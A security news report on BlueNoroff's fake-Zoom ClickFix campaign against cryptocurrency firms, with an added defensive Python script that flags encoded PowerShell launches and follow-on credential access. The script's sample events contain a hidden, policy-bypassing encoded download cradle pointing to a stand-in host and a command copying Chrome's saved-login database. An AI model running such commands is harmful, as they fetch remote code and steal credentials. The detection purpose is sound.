A fake video meeting can now be enough to breach a Web3 company, with North Korea-linked BlueNoroff hackers using bogus Zoom calls, clipboard tricks and fileless PowerShell malware to steal credentials from cryptocurrency targets across multiple countries.
The campaign marks a sharper turn in social engineering against the digital assets sector, where attackers are no longer relying only on malicious attachments or crude phishing pages. Instead, they are building convincing meeting environments, impersonating credible figures in the fintech and legal world, scheduling calls through familiar calendar tools and using stolen or AI-generated video material to lower suspicion before pushing victims into running malicious commands.
Security analysts have tied the activity with high confidence to BlueNoroff, a financially motivated subgroup of the Lazarus Group, which has long targeted cryptocurrency exchanges, blockchain start-ups, venture investors and financial technology companies. The group’s objective is clear: gain access to systems used by executives, developers and operational staff who may hold wallet credentials, session tokens, exchange access, internal documents or privileged communications.
One investigated intrusion involved a North American Web3 and cryptocurrency company. The attacker posed as a senior legal figure connected to the fintech and crypto sector and sent a Calendly invitation carrying a typosquatted Zoom link. The meeting was arranged months ahead, giving the approach the appearance of a normal business engagement rather than an urgent phishing attempt.
When the target joined the fake call, the page closely resembled a browser-based Zoom meeting. The site requested camera access and displayed what appeared to be another participant on the call. Behind the interface, the page was capable of collecting live camera footage that could later be used as bait against other victims, turning compromised professionals into unwilling props for future attacks.
The lure then moved into its decisive phase. A few seconds after the meeting began, the victim was shown a prompt claiming that a Zoom software development kit or meeting component was outdated or malfunctioning. The screen urged the user to press an “Update Now” button or follow troubleshooting steps to restore the call. This tactic belongs to a broader pattern known as ClickFix, where victims are instructed to copy and run commands under the pretence of fixing an audio, video or browser problem.
The campaign’s Windows chain is particularly dangerous because it uses PowerShell commands that can run without dropping a traditional executable file to disk. That fileless design helps the malware evade some conventional antivirus checks, while giving attackers a path to establish command-and-control access, collect browser credentials, steal Telegram session data and search for cryptocurrency wallet extensions.
A notable twist in the campaign is clipboard manipulation. Victims may believe they are copying a harmless troubleshooting command, but malicious JavaScript embedded in the fake meeting site can intercept the copy action and replace the clipboard content with attacker-controlled code. Once pasted into a terminal, the command can launch the PowerShell infection chain and give the hackers a foothold within minutes.
The operational speed of the intrusion is one of its most alarming features. In the investigated case, the sequence from clicking the meeting link to establishing remote access, harvesting credentials and setting persistence was completed in under five minutes. That narrow window leaves little room for human intervention once the victim follows the prompt.
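As an added example, not part of this report, the following Python triage script shows what a defender can look for in Windows process-creation telemetry to catch the chain described above: a PowerShell launch from a user shell (the pasted "fix" command), run with a hidden window and a base64-encoded in-memory download cradle (the fileless design), followed within the five-minute window by access to browser or Telegram credential stores. The event shape, host names, timestamps, paths and command lines are constructed for the example; the Chrome `Login Data` file and Telegram `tdata` folder are real locations, and the scoring weights and threshold are assumptions to be tuned per environment.

```python
"""Defensive triage of Windows process-creation telemetry for ClickFix-style
PowerShell launches (paste-and-run lures) and the credential access that may
follow within minutes. Added example: event shape and all sample values are
constructed, not taken from any real incident."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed encoded command, built here so the sample stays readable.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://update.invalid/fix')"
    .encode("utf-16le")
).decode()

# Assumed minimal event shape: Sysmon Event ID 1-like fields, flattened.
SAMPLE_EVENTS = [
    {"time": "2025-03-04T10:15:02", "host": "WS-17",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -ep bypass -enc {_ENCODED}"},
    {"time": "2025-03-04T10:17:40", "host": "WS-17",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c copy "C:\Users\a\AppData\Local\Google\Chrome\User Data\Default\Login Data" C:\Users\a\AppData\Local\Temp\ld.db'},
    {"time": "2025-03-04T11:02:11", "host": "WS-22",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Inventory\collect.ps1"},
]

# -e / -ec / -enc / -encodedcommand followed by a base64 blob.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
_HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b")
_BYPASS_RE = re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass")
_CRADLE_RE = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|net\.webclient|start-bitstransfer")
# Chrome credential stores and the Telegram Desktop session folder.
_CRED_RE = re.compile(r"(?i)login data|local state|web data|\btdata\b")
_USER_SHELL_PARENTS = ("explorer.exe", "cmd.exe", "windowsterminal.exe")
ALERT_THRESHOLD = 3          # assumption: tune per environment
WINDOW = timedelta(minutes=5)  # matches the sub-five-minute chain in the report


@dataclass
class Finding:
    host: str
    time: datetime
    score: int
    reasons: list[str] = field(default_factory=list)
    followed_by_credential_access: bool = False


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> str | None:
    """Return the decoded -EncodedCommand payload (UTF-16LE) or None."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_launch(event: dict) -> Finding:
    """Score one PowerShell launch on ClickFix-style indicators."""
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    effective = cmd + ("\n" + decoded if decoded else "")  # inspect decoded text too
    f = Finding(event["host"], datetime.fromisoformat(event["time"]), 0)
    parent = _basename(event["parent_image"])
    if parent in _USER_SHELL_PARENTS:
        f.reasons.append(f"launched from user shell ({parent}): typical of paste-and-run lures")
        f.score += 2
    if _HIDDEN_RE.search(cmd):
        f.reasons.append("hidden window")
        f.score += 1
    if decoded is not None:
        f.reasons.append("base64-encoded command decoded")
        f.score += 1
    if _BYPASS_RE.search(cmd):
        f.reasons.append("execution policy bypass")
        f.score += 1
    if _CRADLE_RE.search(effective):
        f.reasons.append("in-memory download cradle (fileless)")
        f.score += 2
    return f


def triage(events: list[dict]) -> list[Finding]:
    """Flag suspicious launches and correlate credential-store access on the
    same host within WINDOW after the launch."""
    findings: list[Finding] = []
    ordered = sorted(events, key=lambda e: e["time"])
    for i, ev in enumerate(ordered):
        if _basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        f = score_launch(ev)
        if f.score < ALERT_THRESHOLD:
            continue
        for later in ordered[i + 1:]:
            if datetime.fromisoformat(later["time"]) - f.time > WINDOW:
                break  # events are time-ordered, nothing later can qualify
            if later["host"] == ev["host"] and _CRED_RE.search(later["command_line"]):
                f.followed_by_credential_access = True
                f.reasons.append("credential store touched within 5 minutes of launch")
                f.score += 3
                break
        findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding.time} {finding.host} score={finding.score}")
        for reason in finding.reasons:
            print("  -", reason)
```

Only the explorer-launched, hidden, encoded cradle on WS-17 crosses the threshold; the scheduled inventory script on WS-22 scores a single point for its execution-policy switch and is ignored, which is the kind of separation a rule needs before it is trusted in a busy fleet.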
The targeting pattern shows a global operation rather than an isolated breach. Investigators identified more than 100 additional targets whose compromised media appeared on attacker-controlled infrastructure. Victims were spread across more than 20 countries and five regions, with the United States forming the largest share, followed by Singapore and the United Kingdom. A large proportion of identified victims worked in cryptocurrency, blockchain or related finance roles, and many held senior positions such as chief executive or co-founder.
BlueNoroff’s use of fake meetings is not new, but the latest Windows-focused variant shows how the group is adapting. Earlier campaigns used fake Zoom or Microsoft Teams templates, bogus audio-error messages, malicious AppleScript on macOS, recruitment lures on Telegram, and cloned venture-capital or start-up personas. The current activity blends those methods with AI-generated profile material, stolen webcam footage and carefully staged business outreach.
The broader threat landscape is also changing. Web3 companies often operate across distributed teams, use encrypted messaging apps, depend on browser-based wallets and move quickly on investment or partnership calls. Those habits create openings for attackers who can impersonate investors, legal advisers, founders or recruiters. The same tools that make remote deal-making easier also give threat actors a route into high-value targets.
For cryptocurrency firms, the risk extends beyond a single compromised laptop. Stolen browser sessions can expose cloud dashboards, exchange accounts, wallet extensions, code repositories and internal chat platforms. Access to Telegram or other messaging accounts can help attackers impersonate the victim, approach colleagues and continue the chain of compromise. Even camera footage has become a reusable asset, allowing hackers to populate fake calls with believable faces.